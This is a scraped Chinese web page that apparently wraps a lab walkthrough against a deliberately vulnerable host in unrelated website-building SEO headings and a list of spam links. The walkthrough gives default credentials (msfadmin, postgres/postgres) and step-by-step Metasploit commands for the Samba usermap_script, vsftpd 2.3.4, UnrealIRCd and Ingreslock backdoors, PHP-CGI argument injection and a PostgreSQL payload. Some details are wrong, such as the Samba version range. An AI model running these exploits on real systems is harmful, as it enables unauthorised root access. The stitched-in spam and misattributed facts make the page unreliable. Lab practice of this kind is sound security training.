当前位置: 首页 > news >正文

PHP企业网站开发实践安装wordpress素锦

PHP企业网站开发实践,安装wordpress素锦,wordpress 跳转 微信,国内做网站制作比较一、信息收集 nmap扫描靶机信息 二、弱口令 1.系统弱口令 在Kali Linux中使用telnet远程连接靶机 输入账号密码msfadmin即可登录 2.MySQL弱口令 使用mysql -h 靶机IP地址即可连接 3.PostgreSQL弱密码登录 输入psql -h 192.168.110.134 -U postgres 密码为postgres 输入\…一、信息收集 nmap扫描靶机信息 二、弱口令 1.系统弱口令 在Kali Linux中使用telnet远程连接靶机 输入账号密码msfadmin即可登录 2.MySQL弱口令 使用mysql -h 靶机IP地址即可连接 3.PostgreSQL弱密码登录 输入psql -h 192.168.110.134 -U postgres 密码为postgres 输入\q可以退出 4.VNC弱口令 二、漏洞利用 一下漏洞利用工具基本均为MSF 1.Samba MS-RPC Shell命令注入 此漏洞允许远程攻击者在易受攻击的Samba服务器上上传和执行恶意代码。它影响了Samba版3.5.0到4.6.4包括在内并随Samba 4.6.5的发布进行了修补。 1.使用模块use exploit/multi/samba/usermap_script2.设置参数set rhost 靶机IP地址3.执行run4.执行命令查看目录ls 2.vsftpd后门 vsftpd后门漏洞指的是vsftpdVery Secure FTP Daemon软件的一个安全漏洞也被称“Backdoor-VSFTPd”或“vsftpd 2.3.4 Backdoor”。 这个漏洞最初发现于2011年并影响了vsftpd版本2.3.4。攻击者可以利用该漏洞通过一个特定的用户名进行登录然后在无需经过认证的情况下获得系统访问权限。 1.MSF中使用以下模块use exploit/unix/ftp/vsftpd_234_backdoor2.设置靶机IPset rhost 靶机IP3.执行并查看runls 3.UnreallRCd后门 UnrealIRCd是一种常见的开源IRC服务器软件被用于构建IRCInternet Relay Chat网络。在过去的几年中UnrealIRCd曾发现过一个后门漏洞被称为“UnrealIRCd后门”或“Unreal3.2.8.1Backdoor”。 这个后门漏洞于2010年被公开揭露。攻击者利用这个后门可以在受影响的UnrealIRCd服务器上获取远程执行代码的权限也可以用于执行各种恶意活动如监控聊天内容、获取敏感信息等。 1.搜索模块search unreal ircd2.搜索payload并使用一下payloadcmd/unix/bind_perl 3.设置参数set rhost 靶机IP地址4.执行run 4.PHP CGI参数注入执行漏洞 PHP CGI 参数注入执行漏洞是一种安全漏洞它影响在以 CGI 模块方式运行的 Web 服务器上的PHP 程序。该漏洞的根本原因是在使用 CGI 模块处理 PHP 脚本时未正确过滤和处理用户输入导致的参数注入漏洞。 攻击者利用这个漏洞可以通过特制的 URL 参数注入恶意代码执行任意的命令或访问系统敏感文件甚至可能导致服务器完全被入侵控制。 1.搜索模块srach php_cgi2.使用模块并设置参数use exploit/multi/http/php_cgi_arg_injectionset rhost 靶机IP地址3.执行run 5.Ingreslock后门 Ingreslock后门程序运行在1524端口连接到1524端口就能直接获得root权限经常用于入侵一个暴露的服务器直接使用telnet命令获取权限 6.Postgres共享库代码任意执行 1.搜索模块use exploit/linux/postgres/postgres_payload 2.设置参数set rhost 靶机IPset lhost kali的IP3.执行参数 run
http://www.zqtcl.cn/news/454684/

相关文章:

  • 智能建站大师官网平台招聘页面设计模板
  • 网页制作三剑客不包括优化关键词推广
  • 济南设计网站中盛浩瀚建设有限公司网站
  • 做袜子娃娃的网站wordpress 文章卡片
  • 网站建设的相关新闻做网站需准备些什么问题
  • 深圳一建公司地址安徽网络seo
  • 永州网站建设gwtcms爱网站无法登录怎么回事
  • 常用于做网站的软件优质网站建设哪家好
  • 网站怎么做响应网络营销怎么做有特色
  • 电子商务企业网站的推广方式正邦设计怎么样
  • 哪个网站可以免费下载ppt模板简述网站开发的过程
  • 中国商标注册网官方网站广东网站建设包括什么软件
  • 个人如何做网站软件企业网站制作设
  • 无锡百度公司王东百度免费优化
  • 做移动网站快速排名软件正能量网站网址大全
  • 网站横幅代码山东省住房和城乡建设厅电话号码
  • 营销模式有哪些seo点击软件哪个好用
  • 信息流网站建设做网站换服务器怎么整
  • html5网站编写wordpress同步到本地
  • php商城网站开发工业设计在线
  • 网站建设发布实训总结网站自适应代码
  • 网站建设与管理是什么摄影网站 蜂鸟
  • 廊坊做网站的大公司wordpress+主题加速
  • 做网站还能挣钱吗网页端
  • 自适应网站建设推荐淘宝详情页设计
  • 手机网站域名设置深圳的网站建设公司怎么样
  • 余姚网站建设设计服务cms网站源码
  • 工作是套模板做网站想做网站制作运营注册什么公司核实
  • 北京网站建设116networdpress导航栏下拉菜单
  • 医院网站建设的目标网络服务许可证